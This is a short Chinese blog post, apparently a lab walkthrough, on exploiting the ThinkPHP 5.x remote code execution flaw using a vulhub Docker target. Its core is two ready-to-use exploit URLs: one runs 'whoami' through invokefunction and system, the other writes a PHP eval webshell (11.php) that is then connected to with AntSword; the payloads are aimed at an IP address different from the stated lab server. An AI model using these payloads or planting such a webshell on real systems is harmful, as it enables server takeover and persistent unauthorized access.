Thinkphp(TP)框架漏洞攻略

故事与他6452025-03-26 2:07

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
RTC老炮4 小时前
webrtc弱网-LossBasedBandwidthEstimation类源码分析与算法原理
网络·算法·webrtc
想成为大佬的每一天4 小时前
Linux:NTP服务
linux·网络
Chan165 小时前
消息推送的三种常见方式:轮询、SSE、WebSocket
java·网络·websocket·网络协议·http·sse
天天开心a5 小时前
OSPF基础部分知识点
网络·笔记·学习·智能路由器·hcip
半路_出家ren5 小时前
路由策略实验配置
网络·rip·ospf·策略路由·路由策略
1candobetter5 小时前
软考中级习题与解答——第三章_操作系统(1)
linux·运维·服务器
studyForMokey5 小时前
【Android 消息机制】Handler
android
敲代码的鱼哇5 小时前
跳转原生系统设置插件 支持安卓/iOS/鸿蒙UTS组件
android·ios·harmonyos
翻滚丷大头鱼5 小时前
android View详解—动画
android
我是好小孩6 小时前
[Android]RecycleView的item用法
android
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路032025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定04UV安装并设置国内源05不再让Windows更新!&Edge游戏助手卸载及关闭自动更新062025高教社杯国赛数学建模选题建议+初步分析072025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定08KGG转MP3工具|非KGM文件|解密音频09教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员10jdk21下载、安装(Windows、Linux、macOS)